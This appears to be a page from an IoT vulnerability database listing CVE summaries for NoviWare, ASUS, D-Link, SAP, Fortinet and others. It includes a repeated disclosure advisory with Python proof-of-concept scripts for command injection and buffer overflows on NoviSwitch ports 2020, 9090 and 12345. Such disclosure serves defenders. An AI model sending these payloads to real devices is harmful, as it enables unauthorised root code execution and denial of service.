VARIoT IoT vulnerabilities database

A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlowNoviWare and NoviSwitchdevices are products of NoviFlow Canada. NoviSwitchdevices is a series of switch devices. NoviWare is the switch software used in it. NoviFlowNoviWareNW400.2.6 and previous versions and noviSwitch devices have a security vulnerability in the network interface of novi_process_manager_daemon. A remote attacker could exploit the vulnerability to execute code with root privileges. NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities Introduction ========== NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices. CVEs ===== * CVE-2017-12784: remote code execution in novi_process_manager_daemon Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) * CVE-2017-12785: cli breakout in novish Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) * CVE-2017-12786: remote code execution in noviengine and cliengine Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) Affected versions ============== NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed Author ====== FranASSois Goichon - Google Security Team CVE-2017-12784 ============== Remote code execution in novi_process_manager_daemon Summary ------------- The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. - A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service - This network service is prone to command injection and a stack-based buffer overflow Reproduction ------------------ If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, 2020)) payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00" s.sendall(pack("<II", 1, len(payload)+8)) s.sendall(payload) s.close() --- On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. CVE-2017-12785 ============== Cli breakout in novish Summary ------------- The NoviWare switching software distribution is prone to a buffer overflow and a command injection, allowing authenticated, low-privileged users to break out of the CLI and execute commands as root. Reproduction ------------------ Log in to the appliance via SSH and run the following command from the CLI: -- noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -- If the appliance is vulnerable, the cli crashes and the session ends. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. - A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services - These network services are prone to a stack-based buffer overflow when unpacking serialized values. Reproduction ------------------ If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, <9090 or 12345>)) payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)]) payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload s.sendall(payload) s.read(1) s.close() --- A watchdog should restart the service if it has crashed. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. Disclosure timeline =============== 2017/05/11 - Report sent to NoviFlow 2017/05/26 - Bugs acknowledged and remediation timeline confirmed 2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities 2017/08/09 - CVE requests 2017/08/16 - Public disclosure

The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities Introduction ========== NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices. CVEs ===== * CVE-2017-12784: remote code execution in novi_process_manager_daemon Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) * CVE-2017-12785: cli breakout in novish Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) * CVE-2017-12786: remote code execution in noviengine and cliengine Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) Affected versions ============== NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed Author ====== FranASSois Goichon - Google Security Team CVE-2017-12784 ============== Remote code execution in novi_process_manager_daemon Summary ------------- The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. - A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service - This network service is prone to command injection and a stack-based buffer overflow Reproduction ------------------ If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, 2020)) payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00" s.sendall(pack("<II", 1, len(payload)+8)) s.sendall(payload) s.close() --- On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. Reproduction ------------------ Log in to the appliance via SSH and run the following command from the CLI: -- noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -- If the appliance is vulnerable, the cli crashes and the session ends. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. - A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services - These network services are prone to a stack-based buffer overflow when unpacking serialized values. Reproduction ------------------ If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, <9090 or 12345>)) payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)]) payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload s.sendall(payload) s.read(1) s.close() --- A watchdog should restart the service if it has crashed. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. Disclosure timeline =============== 2017/05/11 - Report sent to NoviFlow 2017/05/26 - Bugs acknowledged and remediation timeline confirmed 2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities 2017/08/09 - CVE requests 2017/08/16 - Public disclosure

Cross-site scripting (XSS) vulnerability in Video Metadata Editor in Synology Video Station before 2.3.0-1435 allows remote authenticated attackers to inject arbitrary web script or HTML via the title parameter. Synology Video Station Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Synology Video Station is a video manager from Synology. Video Metadata Editor is one of the video metadata editors

The DIR series is a series of cloud router products from D-Link. The D-LinkDIR series routers have a remote information bypass vulnerability that triggers global variables when an administrator logs in to the device. Therefore, an attacker can use this global variable to bypass security checks and use it to read arbitrary files and obtain sensitive information such as administrator account passwords.

The DIR series is a series of cloud router products from D-Link. A remote command execution vulnerability exists in the D-LinkDIR series router. The attacker can obtain the router background login credentials and execute arbitrary code through the router public network portal.

A privilege escalation vulnerability was identified in Lenovo Active Protection System for ThinkPad systems versions earlier than 1.82.0.17. An attacker with local privileges could execute code with administrative privileges via an unquoted service path. plural Lenovo ThinkPad The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Lenovo Active Protection System is prone to a local privilege-escalation vulnerability. Lenovo Thinkpad for Windows is a Windows-based portable computer owned by China Lenovo (Lenovo). Active Protection System is an autonomous feature designed to protect hard drives from damage caused by strong physical shocks and vibrations

Data corruption vulnerability in firmware in Intel Solid-State Drive Professional PSF104P, PSF109P allows local users to cause a denial of service via unspecified vectors. IntelSolid-StateDriveProfessional is a solid state drive from Intel Corporation of the United States. There is a security vulnerability in the firmware in the IntelSolid-StateDriveProfessionalPSF104P and PSF109P versions

Data corruption vulnerability in firmware in Intel Solid-State Drive Consumer, Professional, Embedded, Data Center affected firmware versions LSBG200, LSF031C, LSF036C, LBF010C, LSBG100, LSF031C, LSF036C, LBF010C, LSF031P, LSF036P, LBF010P, LSF031P, LSF036P, LBF010P, LSMG200, LSF031E, LSF036E, LSMG100, LSF031E, LSF036E, LSDG200, LSF031D, LSF036D allows local users to cause a denial of service via unspecified vectors. plural Intel The firmware contains an input validation vulnerability.Denial of service (DoS) May be in a state. Intel SSD540sSeries and so on are all different series of SSD products from Intel Corporation of the United States. There are security vulnerabilities in several Intel products

Stack buffer overflow in httpd in Asuswrt-Merlin firmware 380.67_0RT-AC5300 and earlier for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by sending a crafted http GET request packet that includes a long delete_offline_client parameter in the url. plural ASUS For devices Asuswrt-Merlin Firmware and ASUS The firmware contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC5300 and others are wireless routers from ASUS. ASUSAsuswrt-Merlin is the firmware running in it. Httpd is one of the embedded http servers. A stack buffer overflow vulnerability exists in Asuswrt-Merlin380.67_0RT-AC5300 and previous versions of httpd in several ASUS products

An Uncontrolled Search Path Element issue was discovered in Moxa SoftNVR-IA Live Viewer, Version 3.30.3122 and prior versions. An uncontrolled search path element (DLL Hijacking) vulnerability has been identified. To exploit this vulnerability, an attacker could rename a malicious DLL to meet the criteria of the application, and the application would not verify that the DLL is correct. The attacker needs to have administrative access to the default install location in order to plant the insecure DLL. Once loaded by the application, the DLL could run malicious code at the privilege level of the application. Moxa SoftNVR-IA Live Viewer is a video surveillance software developed by Moxa for industrial automation systems. A DLL native arbitrary code execution vulnerability exists in Moxa SoftNVR-IA Live Viewer 3.30.3122 and earlier. This vulnerability stems from a program failing to properly filter user-submitted input

SAP NetWeaver is prone to an unspecified SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

SAP NetWeaver is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.

Buffalo WCR-1166DS devices with firmware 1.30 and earlier allow an attacker to execute arbitrary OS commands via unspecified vectors. WCR-1166DS provided by BUFFALO INC.is a wireless LAN router. WCR-1166DS contains an OS command injection vulnerability (CWE-78). Masashi Shiraishi of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.A user who can access the administrative console of the device may execute an arbitrary OS command. Buffalo WCR-1166DS with firmware version 1.30 and earlier has a security vulnerability

Untrusted search path vulnerability in Installer of Qua station connection tool for Windows version 1.00.03 allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. Qua station provided KDDI CORPORATION is a 4G LTE photostrage. Qua station connection tool is used to view data saved on Qua station from a PC and/or save data on a PC. Eili Masami of Tachibana Lab. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.Arbitrary code may be executed with the privilege of the user invoking the installer. A remote attacker can exploit this vulnerability to obtain permissions by means of a malicious DLL in the directory

SAP NetWeaver Visual Composer is prone to a vulnerability that lets attackers inject and execute arbitrary code. Successful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition.

SAP SRM is prone to multiple unspecified security vulnerabilities. Little is known about this issue or its effects at this time. We will update this BID as more information emerges.

SAP NetWeaver is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.

An information disclosure vulnerability in Fortinet FortiWeb 5.8.2 and below versions allows logged-in admin user to view SNMPv3 user password in cleartext in webui via the HTML source code. Fortinet FortiWeb Contains an information disclosure vulnerability.Information may be obtained. Fortinet Fortiweb is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. Fortinet Fortiweb 5.8.2 and prior versions are vulnerable. Fortinet FortiWeb is a web application layer firewall developed by Fortinet, which can block threats such as cross-site scripting, SQL injection, cookie poisoning, schema poisoning, etc., to ensure the security of web applications and protect sensitive database content

An information disclosure vulnerability in Fortinet FortiOS 5.6.0, 5.4.4 and below versions allows attacker to get FortiOS version info by inspecting FortiOS IKE VendorID packets. Fortinet FortiOS Contains an information disclosure vulnerability.Information may be obtained. Fortinet FortiOS is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. Fortinet FortiOS 5.0.0 through 5.4.4 and 5.6.0 are vulnerable. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam